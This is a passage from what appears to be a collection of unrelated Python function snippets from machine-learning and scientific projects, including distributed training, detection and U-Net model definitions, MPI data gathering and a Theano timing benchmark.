'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model11_2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model12': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 6\n elif Args.model_name == 'model12_again': # stretch = 2000, Q = 0.5 # larger learning rate\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] 
# [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 10 # changed from 6 to 10 for run 4\n elif Args.model_name == 'model12_again2': # stretch = 2000, Q = 0.5 # larger learning rate val set reduced to 10\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 6\n resid_model.config.VALIDATION_STEPS = 10\n else:\n raise AttributeError(\"model not found\", Args.model_name)\n print(\"Train in model:\", Args.model_name)\n resid_model.config.display()\n resid_model.make_resid_model(catalog_name, count=count,\n max_number=max_number, augmentation=True,\n norm_val=norm, input_pull=input_pull,\n sampling_function=sampling_function,\n input_model_mapping=input_model_mapping)\n learning_rate = resid_model.config.LEARNING_RATE/10.\n np.random.seed(Args.epochs)\n history = resid_model.model.train(resid_model.dataset,\n resid_model.dataset_val,\n learning_rate=learning_rate,\n epochs=Args.epochs,\n layers=layers)\n name = Args.model_name + '_run2'\n with open(name + \".dill\", 'wb') as handle:\n dill.dump(history.history, handle)\n learning_rate = resid_model.config.LEARNING_RATE/10.\n np.random.seed(Args.epochs + 10)\n history = resid_model.model.train(resid_model.dataset,\n resid_model.dataset_val,\n learning_rate=learning_rate,\n epochs=Args.epochs+10,\n layers=layers)\n name = Args.model_name + '_run3'\n with open(name + \".dill\", 'wb') as handle:\n dill.dump(history.history, handle)", "def worker(self, gpu_id: int):\n if self.seed is not None:\n make_deterministic(self.seed)\n self.current_rank = self.rank\n if self.distributed:\n if self.multiprocessing:\n # For multiprocessing distributed training, rank needs to be the\n # global rank among all the processes\n self.current_rank = self.rank * self.ngpus_per_node + gpu_id\n dist.init_process_group(\n backend=self.dist_backend,\n init_method=self.dist_url,\n world_size=self.world_size,\n rank=self.current_rank\n )\n # set up process logger\n self.logger = logging.getLogger(\"worker_rank_{}\".format(self.current_rank))\n self.logger.propagate = False\n handler = QueueHandler(self.logger_queue)\n self.logger.addHandler(handler)\n self.logger.setLevel(logging.INFO)\n\n # only write in master process\n if self.current_rank == 0:\n self.tb_writer = self.tb_writer_constructor()\n\n self.logger.info(\n \"Use GPU: %d for training, current rank: %d\",\n gpu_id,\n self.current_rank\n )\n # get dataset\n train_dataset = get_dataset(\n self.global_cfg[\"dataset\"][\"name\"],\n self.global_cfg[\"dataset\"][\"root\"],\n split=\"train\"\n )\n val_dataset = get_dataset(\n self.global_cfg[\"dataset\"][\"name\"],\n self.global_cfg[\"dataset\"][\"root\"],\n split=\"val\"\n )\n # create model\n self.model = get_model(\n model_name=self.global_cfg[\"model\"][\"name\"],\n num_classes=self.global_cfg[\"dataset\"][\"n_classes\"]\n )\n\n self.device = torch.device(\"cuda:{}\".format(gpu_id))\n self.model.to(self.device)\n\n batch_size = self.global_cfg[\"training\"][\"batch_size\"]\n n_workers = self.global_cfg[\"training\"][\"num_workers\"]\n if self.distributed:\n batch_size = int(batch_size / self.ngpus_per_node)\n n_workers = int((n_workers + self.ngpus_per_node - 1) / 
self.ngpus_per_node)\n if self.global_cfg[\"training\"][\"sync_bn\"]:\n self.model = SyncBatchNorm.convert_sync_batchnorm(self.model)\n self.model = DistributedDataParallel(self.model, device_ids=[gpu_id])\n self.logger.info(\"batch_size: {}, workers: {}\".format(batch_size, n_workers))\n\n # define loss function (criterion) and optimizer\n self.loss_fn = CrossEntropyLoss().to(self.device)\n\n optimizer_cls = get_optimizer(self.global_cfg[\"training\"][\"optimizer\"])\n optimizer_params = copy.deepcopy(self.global_cfg[\"training\"][\"optimizer\"])\n optimizer_params.pop(\"name\")\n self.optimizer: Optimizer = optimizer_cls(self.model.parameters(), **optimizer_params)\n self.logger.info(\"Loaded optimizer:\\n%s\", self.optimizer)\n\n # scheduler\n self.scheduler = get_scheduler(self.optimizer, self.global_cfg[\"training\"][\"lr_schedule\"])\n\n if self.distributed:\n train_sampler = DistributedSampler(\n train_dataset,\n shuffle=True,\n drop_last=True\n )\n val_sampler = DistributedSampler(\n val_dataset,\n shuffle=False\n )\n else:\n train_sampler = RandomSampler(train_dataset)\n val_sampler = SequentialSampler(val_dataset)\n\n train_loader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n num_workers=n_workers,\n pin_memory=True,\n sampler=train_sampler\n )\n\n self.val_loader = DataLoader(\n val_dataset,\n batch_size=batch_size,\n num_workers=n_workers,\n pin_memory=True,\n sampler=val_sampler\n )\n self.logger.info(\n \"Load dataset done\\nTraining: %d imgs, %d batchs\\nEval: %d imgs, %d batchs\",\n len(train_dataset),\n len(train_loader),\n len(val_dataset),\n len(self.val_loader)\n )\n iter_generator = make_iter_dataloader(train_loader)\n\n while self.iter < self.global_cfg[\"training\"][\"train_iters\"]:\n img, label = next(iter_generator)\n self.train_iter(img, label)\n\n def is_val():\n p1 = self.iter != 0\n p2 = (self.iter + 1) % self.global_cfg[\"training\"][\"val_interval\"] == 0\n p3 = self.iter == self.global_cfg[\"training\"][\"train_iters\"] - 1\n return (p1 and p2) or p3\n\n # have a validation\n if is_val():\n self.validate()\n # end one iteration\n self.iter += 1", "def update(self, batch):\n if self.opt['cuda']:\n inputs = [Variable(torch.LongTensor(b).cuda()) for b in batch[:3]]\n subj_start_binary = Variable(torch.LongTensor(batch[5]).cuda()).float()\n subj_end_binary = Variable(torch.LongTensor(batch[6]).cuda()).float()\n obj_start_relation = Variable(torch.LongTensor(batch[7]).cuda())\n obj_end_relation = Variable(torch.LongTensor(batch[8]).cuda())\n subj_start_type = Variable(torch.LongTensor(batch[9]).cuda())\n subj_end_type = Variable(torch.LongTensor(batch[10]).cuda())\n obj_start_type = Variable(torch.LongTensor(batch[11]).cuda())\n obj_end_type = Variable(torch.LongTensor(batch[12]).cuda())\n nearest_subj_start_position_for_each_token = Variable(torch.LongTensor(batch[13]).cuda())\n distance_to_nearest_subj_start = Variable(torch.LongTensor(batch[14]).cuda())\n distance_to_subj = Variable(torch.LongTensor(batch[15]).cuda())\n nearest_obj_start_position_for_each_token = Variable(torch.LongTensor(batch[3]).cuda())\n distance_to_nearest_obj_start = Variable(torch.LongTensor(batch[4]).cuda())\n else:\n inputs = [Variable(torch.LongTensor(b)) for b in batch[:4]]\n subj_start_label = Variable(torch.LongTensor(batch[4])).float()\n subj_end_label = Variable(torch.LongTensor(batch[5])).float()\n obj_start_label = Variable(torch.LongTensor(batch[6]))\n obj_end_label = Variable(torch.LongTensor(batch[7]))\n subj_type_start_label = 
Variable(torch.LongTensor(batch[8]))\n subj_type_end_label = Variable(torch.LongTensor(batch[9]))\n obj_type_start_label = Variable(torch.LongTensor(batch[10]))\n obj_type_end_label = Variable(torch.LongTensor(batch[11]))\n subj_nearest_start_for_each = Variable(torch.LongTensor(batch[12]))\n subj_distance_to_start = Variable(torch.LongTensor(batch[13]))\n \n \n mask = (inputs[0].data>0).float()\n # step forward\n self.model.train()\n self.optimizer.zero_grad()\n\n \n subj_start_logits, subj_end_logits, obj_start_logits, obj_end_logits = self.model(inputs, distance_to_subj)\n\n subj_start_loss = self.obj_criterion(subj_start_logits.view(-1, self.opt['num_subj_type']+1), subj_start_type.view(-1).squeeze()).view_as(mask)\n subj_start_loss = torch.sum(subj_start_loss.mul(mask.float()))/torch.sum(mask.float())\n \n subj_end_loss = self.obj_criterion(subj_end_logits.view(-1, self.opt['num_subj_type']+1), subj_end_type.view(-1).squeeze()).view_as(mask)\n subj_end_loss = torch.sum(subj_end_loss.mul(mask.float()))/torch.sum(mask.float())\n \n obj_start_loss = self.obj_criterion(obj_start_logits.view(-1, self.opt['num_class']+1), obj_start_relation.view(-1).squeeze()).view_as(mask)\n obj_start_loss = torch.sum(obj_start_loss.mul(mask.float()))/torch.sum(mask.float())\n \n obj_end_loss = self.obj_criterion(obj_end_logits.view(-1, self.opt['num_class']+1), obj_end_relation.view(-1).squeeze()).view_as(mask)\n obj_end_loss = torch.sum(obj_end_loss.mul(mask.float()))/torch.sum(mask.float())\n \n loss = self.opt['subj_loss_weight']*(subj_start_loss + subj_end_loss) + (obj_start_loss + obj_end_loss)\n \n # backward\n loss.backward()\n # torch.nn.utils.clip_grad_norm(self.model.parameters(), self.opt['max_grad_norm'])\n self.optimizer.step()\n loss_val = loss.data.item()\n return loss_val", "def gather_ps(rank, size, comm, k_allmodels, P21_allmodels, PHII_allmodels,\n first_snap_allmodels, last_snap_allmodels):\n\n def generate_tag(rank):\n tag = int(rank*100)\n\n return tag\n\n # Rank 0 will gather the wavenumber bins/power spectra from all other\n # ranks. \n if rank == 0:\n k_master = []\n P21_master = []\n PHII_master = []\n\n # Go through each model. \n for model_number in range(len(k_allmodels)):\n\n k_master.append([])\n P21_master.append([])\n PHII_master.append([])\n\n model_k = k_allmodels[model_number]\n model_P21 = P21_allmodels[model_number]\n model_PHII = PHII_allmodels[model_number]\n\n num_snaps = last_snap_allmodels[model_number] - \\\n first_snap_allmodels[model_number]\n rank_count = 0\n my_count = 0\n\n # Then go through each snapshot.\n # In the main data loop (``generate_data()``) the snapshots are\n # scatter sequentially. Hence when we gather, we get snap0 from\n # rank 0, snap1 from rank 1 etc. So we increase rank_count for each\n # snapshot and then reset it when we reach `size`.\n for snap_idx in range(num_snaps):\n\n if rank_count == 0:\n this_k = model_k[my_count] \n this_P21 = model_P21[my_count] \n this_PHII = model_PHII[my_count] \n my_count += 1\n else:\n # Each rank will use a unique tag.\n tag = generate_tag(rank_count) \n\n # Then the tag is offset for each data array. 
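                    # k is received with `tag`, P21 with `tag + 1` and PHII with
                    # `tag + 2`, mirroring the comm.send calls issued by the
                    # non-zero ranks at the bottom of this function.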
\n this_k = comm.recv(source = rank_count,\n tag = tag)\n this_P21 = comm.recv(source = rank_count,\n tag = tag+1)\n this_PHII = comm.recv(source = rank_count,\n tag = tag+2)\n\n # Now we have the data, append it to the master.\n k_master[model_number].append(this_k)\n P21_master[model_number].append(this_P21)\n PHII_master[model_number].append(this_PHII)\n\n rank_count += 1\n if rank_count == size:\n rank_count = 0\n\n # Snapshot Loop.\n # Model Loop.\n\n return k_master, P21_master, PHII_master\n\n else:\n\n # For all other ranks, go through the power spectra it calculated and\n # send it back to the root rank.\n for model_number in range(len(k_allmodels)):\n for idx in range(len(P21_allmodels[model_number])):\n\n tag = generate_tag(rank) \n\n k_this_idx = k_allmodels[model_number][idx]\n P21_this_idx = P21_allmodels[model_number][idx]\n PHII_this_idx = PHII_allmodels[model_number][idx]\n\n comm.send(k_this_idx, dest = 0, tag = tag)\n comm.send(P21_this_idx, dest = 0, tag = tag+1)\n comm.send(PHII_this_idx, dest = 0, tag = tag+2)\n\n # Non-zero ranks return junk.\n return None, None, None", "def __init__(self,\n num_class=2,\n layer_nums=(3, 5, 5),\n layer_strides=(2, 2, 2),\n num_filters=(128, 128, 256),\n upsample_strides=(1, 2, 4),\n num_upsample_filters=(256, 256, 256),\n num_input_features=128,\n num_anchor_per_loc=2,\n use_groupnorm=False,\n num_groups=32,\n box_code_size=7,\n num_direction_bins=2):\n super(RPN, self).__init__()\n self._num_anchor_per_loc = num_anchor_per_loc\n self._box_code_size=box_code_size\n self._num_class=num_class\n self._num_direction_bins=num_direction_bins\n assert len(layer_nums) == 3\n assert len(layer_strides) == len(layer_nums)\n assert len(num_filters) == len(layer_nums)\n assert len(upsample_strides) == len(layer_nums)\n assert len(num_upsample_filters) == len(layer_nums)\n upsample_strides=[int(i) for i in upsample_strides]\n\n factors = []\n for i in range(len(layer_nums)):\n assert int(np.prod(\n layer_strides[:i + 1])) % upsample_strides[i] == 0\n factors.append(\n np.prod(layer_strides[:i + 1]) // upsample_strides[i])\n assert all([x == factors[0] for x in factors])\n\n # note that when stride > 1, conv2d with same padding isn't\n # equal to pad-conv2d. 
we should use pad-conv2d.\n block2_input_filters = num_filters[0]\n if use_groupnorm:\n BatchNorm2d = change_default_args(\n num_groups=num_groups, eps=1e-3)(GroupNorm)\n else:\n BatchNorm2d = change_default_args(\n eps=1e-3, momentum=0.01)(nn.BatchNorm2d)\n\n self.block1 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(num_input_features, num_filters[0], 3,\n stride=layer_strides[0],bias=False),\n BatchNorm2d(num_filters[0]),\n nn.ReLU(),)\n for i in range(layer_nums[0]):\n self.block1.add(\n nn.Conv2d(num_filters[0], num_filters[0], 3,padding=1,bias=False))\n self.block1.add(BatchNorm2d(num_filters[0]))\n self.block1.add(nn.ReLU())\n self.deconv1 = Sequential(\n nn.ConvTranspose2d(num_filters[0],num_upsample_filters[0],\n upsample_strides[0],stride=upsample_strides[0],bias=False),\n BatchNorm2d(num_upsample_filters[0]),\n nn.ReLU(),)\n self.block2 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(block2_input_filters,num_filters[1],3,\n stride=layer_strides[1],bias=False),\n BatchNorm2d(num_filters[1]),\n nn.ReLU(),)\n for i in range(layer_nums[1]):\n self.block2.add(\n nn.Conv2d(num_filters[1], num_filters[1], 3, padding=1,bias=False))\n self.block2.add(BatchNorm2d(num_filters[1]))\n self.block2.add(nn.ReLU())\n self.deconv2 = Sequential(\n nn.ConvTranspose2d(num_filters[1],num_upsample_filters[1],\n upsample_strides[1],stride=upsample_strides[1],bias=False),\n BatchNorm2d(num_upsample_filters[1]),\n nn.ReLU(),)\n self.block3 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(num_filters[1], num_filters[2], 3, stride=layer_strides[2],bias=False),\n BatchNorm2d(num_filters[2]),\n nn.ReLU(),)\n for i in range(layer_nums[2]):\n self.block3.add(nn.Conv2d(num_filters[2], num_filters[2], 3, padding=1,bias=False))\n self.block3.add(BatchNorm2d(num_filters[2]))\n self.block3.add(nn.ReLU())\n self.deconv3 = Sequential(\n nn.ConvTranspose2d(\n num_filters[2],num_upsample_filters[2],\n upsample_strides[2],stride=upsample_strides[2],bias=False),\n BatchNorm2d(num_upsample_filters[2]),\n nn.ReLU(),)\n\n num_cls = num_anchor_per_loc * num_class\n self.conv_cls = nn.Conv2d(sum(num_upsample_filters), num_cls, 1)\n self.conv_box = nn.Conv2d(sum(num_upsample_filters), num_anchor_per_loc * box_code_size, 1)\n self.conv_dir_cls = nn.Conv2d(sum(num_upsample_filters),num_anchor_per_loc * num_direction_bins, 1)", "def compute_BP(self, betas, bias, type, idx_to_keep = None):\n\n if idx_to_keep is not None:\n betas[self._all_but(len(betas),idx_to_keep)] = 0.\n\n if type == 'rates':\n y1 = self.responses_all[:,self.stimuli == -1]\n y2 = self.responses_all[:,self.stimuli == +1]\n if type == 'regressors':\n y1 = self.regressors[:,self.stimuli == -1]\n y2 = self.regressors[:,self.stimuli == +1]\n if type == 'shuffled':\n y_sh = self._shuffle_regressors()\n y1 = y_sh[:,self.stimuli == -1]\n y2 = y_sh[:,self.stimuli == +1]\n\n x1 = np.dot(betas, y1) + bias\n x2 = np.dot(betas, y2) + bias\n p_c_1 = 1 - expit(x1) # = p(c=-1|s=-1,x)\n p_c_2 = expit(x2)\n BP = np.sum(p_c_1) + np.sum(p_c_2)\n BP = BP/float(self.ntrials)\n return BP", "def run_simple_CNN():\n [train_set, test_set, train_sampler, val_sampler, test_sampler] = pre_processing_and_samples()\n CNN = SimpleCNN()\n # Using GPU for training\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(device)\n if torch.cuda.is_available():\n print(\"cuda is available\")\n CNN.to(device)\n\n # Multiple GPUs\n if torch.cuda.device_count() > 1:\n CNN = nn.DataParallel(CNN)\n\n num_epochs = 100\n\n train_loss_hist, train_acc_hist, val_loss_hist, val_acc_hist 
= \\\n trainCNN(net=CNN, device=device, batch_size=64, n_epochs=num_epochs, learning_rate=0.001,\n train_set=train_set, test_set=test_set, train_sampler=train_sampler, val_sampler=val_sampler)\n test(net=CNN, device=device, test_set=test_set, test_sampler=test_sampler)\n\n fig, (ax1, ax2) = plt.subplots(2)\n\n ax1.set_title(\"Loss vs. Number of Training Epochs\")\n ax1.set(xlabel=\"Training Epoch\", ylabel=\"Loss\")\n ax1.plot(range(1, len(train_loss_hist) + 1), train_loss_hist, label=\"Training\")\n ax1.plot(range(1, len(val_loss_hist) + 1), val_loss_hist, label=\"Validation\")\n print(np.concatenate((train_loss_hist, val_loss_hist)))\n print(np.amax(np.concatenate((train_loss_hist, val_loss_hist))))\n ax1.set_ylim(\n (0, 1.25 * np.amax(np.concatenate((train_loss_hist, val_loss_hist), axis=0, out=None)).detach().cpu()))\n ax1.set_xticks(np.arange(1, num_epochs + 1, 1.0))\n ax1.legend()\n\n ax2.set_title(\"Accuracy vs. Number of Training Epochs\")\n ax2.set(xlabel=\"Training Epoch\", ylabel=\"Accuracy\")\n ax2.plot(range(1, num_epochs + 1), train_acc_hist, label=\"Training\")\n ax2.plot(range(1, num_epochs + 1), val_acc_hist, label=\"Validation\")\n ax2.set_ylim(0, 100) # Sets y bounds\n ax2.set_xticks(np.arange(1, num_epochs + 1, 1.0))\n ax2.legend()\n\n plt.tight_layout() # Call after plotting all subplots\n plt.savefig('basic_cifar_10.png')", "def u_net_bn(x, is_train=False, reuse=False, pad='SAME', n_out=3):\n _, nx, ny, nz = x.shape\n print(\" * Input: size of image: (%d %d %d)\" % (nx, ny, nz))\n w_init = tf.truncated_normal_initializer(stddev=0.01)\n b_init = tf.constant_initializer(value=0.0)\n decay = 0.9\n gamma_init=tf.random_normal_initializer(1., 0.02)\n lrelu = lambda x: tf.nn.leaky_relu(x, 0.2)\n with tf.variable_scope(\"u_net_bn\", reuse=reuse):\n inputs = InputLayer(x, name='in')\n\n conv1 = Conv2d(inputs, 64, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=b_init, name='conv1')\n conv2 = Conv2d(conv1, 128, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv2')\n conv2 = BatchNormLayer(conv2, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn2')\n\n conv3 = Conv2d(conv2, 256, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv3')\n conv3 = BatchNormLayer(conv3, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn3')\n\n conv4 = Conv2d(conv3, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv4')\n conv4 = BatchNormLayer(conv4, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn4')\n\n conv5 = Conv2d(conv4, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv5')\n conv5 = BatchNormLayer(conv5, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn5')\n\n conv6 = Conv2d(conv5, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv6')\n conv6 = BatchNormLayer(conv6, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn6')\n\n conv7 = Conv2d(conv6, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv7')\n conv7 = BatchNormLayer(conv7, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn7')\n\n conv8 = Conv2d(conv7, 512, (4, 4), (2, 2), act=lrelu, padding=pad, W_init=w_init, b_init=b_init, name='conv8')\n print(\" * After conv: %s\" % conv8.outputs)\n\n up7 = DeConv2d(conv8, 512, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, 
name='deconv7')\n up7 = BatchNormLayer(up7, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn7')\n\n # print(up6.outputs)\n up6 = ConcatLayer([up7, conv7], concat_dim=3, name='concat6')\n up6 = DeConv2d(up6, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv6')\n up6 = BatchNormLayer(up6, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn6')\n # print(up6.outputs)\n\n up5 = ConcatLayer([up6, conv6], concat_dim=3, name='concat5')\n up5 = DeConv2d(up5, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv5')\n up5 = BatchNormLayer(up5, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn5')\n # print(up5.outputs)\n\n up4 = ConcatLayer([up5, conv5] ,concat_dim=3, name='concat4')\n up4 = DeConv2d(up4, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv4')\n up4 = BatchNormLayer(up4, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn4')\n\n up3 = ConcatLayer([up4, conv4] ,concat_dim=3, name='concat3')\n up3 = DeConv2d(up3, 256, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv3')\n up3 = BatchNormLayer(up3, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn3')\n\n up2 = ConcatLayer([up3, conv3] ,concat_dim=3, name='concat2')\n up2 = DeConv2d(up2, 128, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv2')\n up2 = BatchNormLayer(up2, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn2')\n\n up1 = ConcatLayer([up2, conv2] ,concat_dim=3, name='concat1')\n up1 = DeConv2d(up1, 64, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv1')\n up1 = BatchNormLayer(up1, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn1')\n\n up0 = ConcatLayer([up1, conv1] ,concat_dim=3, name='concat0')\n up0 = DeConv2d(up0, 64, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv0')\n up0 = BatchNormLayer(up0, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn0')\n # print(up0.outputs)\n\n out = Conv2d(up0, n_out, (1, 1), act=tf.nn.sigmoid, name='out')\n\n print(\" * Output: %s\" % out.outputs)\n\n return out", "def speed():\r\n\r\n algo = ['logistic_sgd', 'logistic_cg', 'mlp', 'convolutional_mlp',\r\n 'dA', 'SdA', 'DBN', 'rbm', 'rnnrbm']\r\n to_exec = [True] * len(algo)\r\n# to_exec = [False] * len(algo)\r\n# to_exec[-1] = True\r\n do_float64 = True\r\n do_float32 = True\r\n do_gpu = True\r\n\r\n algo_executed = [s for idx, s in enumerate(algo) if to_exec[idx]]\r\n #Timming expected are from the buildbot that have an i7-920 @\r\n # 2.67GHz with hyperthread enabled for the cpu, 12G of ram. An GeForce GTX\r\n # 285 for the GPU. OS=Fedora 14, gcc=4.5.1, python/BLAS from EPD\r\n # 7.1-2 (python 2.7.2, mkl unknow). BLAS with only 1 thread.\r\n\r\n expected_times_64 = numpy.asarray([10.0, 22.5, 76.1, 73.7, 116.4,\r\n 346.9, 381.9, 558.1, 186.3])\r\n expected_times_32 = numpy.asarray([11.6, 29.6, 42.5, 66.5, 71,\r\n 191.2, 226.8, 432.8, 176.2])\r\n\r\n # Number with just 1 decimal are new value that are faster with\r\n # the Theano version 0.5rc2 Other number are older. 
They are not\r\n # updated, as we where faster in the past!\r\n # TODO: find why and fix this!\r\n\r\n# Here is the value for the buildbot on February 3th 2012.\r\n# sgd, cg mlp conv da\r\n# sda dbn rbm\r\n# gpu times[3.72957802, 9.94316864, 29.1772666, 9.13857198, 25.91144657,\r\n# 18.30802011, 53.38651466, 285.41386175]\r\n# expected [3.076634879, 7.555234910, 18.99226785, 9.58915591, 24.130070450,\r\n# 24.77524018, 92.66246653, 322.340329170]\r\n# sgd, cg mlp conv da\r\n# sda dbn rbm\r\n#expected/get [0.82492841, 0.75984178, 0.65092691, 1.04930573, 0.93125138\r\n# 1.35324519 1.7356905 1.12937868]\r\n expected_times_gpu = numpy.asarray([3.07663488, 7.55523491, 18.99226785,\r\n 9.6, 24.13007045,\r\n 20.4, 56, 302.6, 315.4])\r\n expected_times_64 = [s for idx, s in enumerate(expected_times_64)\r\n if to_exec[idx]]\r\n expected_times_32 = [s for idx, s in enumerate(expected_times_32)\r\n if to_exec[idx]]\r\n expected_times_gpu = [s for idx, s in enumerate(expected_times_gpu)\r\n if to_exec[idx]]\r\n\r\n def time_test(m, l, idx, f, **kwargs):\r\n if not to_exec[idx]:\r\n return\r\n print algo[idx]\r\n ts = m.call_time\r\n try:\r\n f(**kwargs)\r\n except Exception, e:\r\n print >> sys.stderr, 'test', algo[idx], 'FAILED', e\r\n l.append(numpy.nan)\r\n return\r\n te = m.call_time\r\n l.append(te - ts)\r\n\r\n def do_tests():\r\n m = theano.compile.mode.get_default_mode()\r\n l = []\r\n time_test(m, l, 0, logistic_sgd.sgd_optimization_mnist, n_epochs=30)\r\n time_test(m, l, 1, logistic_cg.cg_optimization_mnist, n_epochs=30)\r\n time_test(m, l, 2, mlp.test_mlp, n_epochs=5)\r\n time_test(m, l, 3, convolutional_mlp.evaluate_lenet5, n_epochs=5,\r\n nkerns=[5, 5])\r\n time_test(m, l, 4, dA.test_dA, training_epochs=2,\r\n output_folder='tmp_dA_plots')\r\n time_test(m, l, 5, SdA.test_SdA, pretraining_epochs=1,\r\n training_epochs=2, batch_size=300)\r\n time_test(m, l, 6, DBN.test_DBN, pretraining_epochs=1,\r\n training_epochs=2, batch_size=300)\r\n time_test(m, l, 7, rbm.test_rbm, training_epochs=1, batch_size=300,\r\n n_chains=1, n_samples=1, output_folder='tmp_rbm_plots')\r\n time_test(m, l, 8, rnnrbm.test_rnnrbm, num_epochs=1)\r\n return numpy.asarray(l)\r\n\r\n #test in float64 in FAST_RUN mode on the cpu\r\n import theano\r\n if do_float64:\r\n theano.config.floatX = 'float64'\r\n theano.config.mode = 'FAST_RUN'\r\n float64_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n\r\n #test in float32 in FAST_RUN mode on the cpu\r\n theano.config.floatX = 'float32'\r\n if do_float32:\r\n float32_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n\r\n if do_float64:\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr\r\n print >> sys.stderr, 'Duplicate the timing to have everything in one place'\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> 
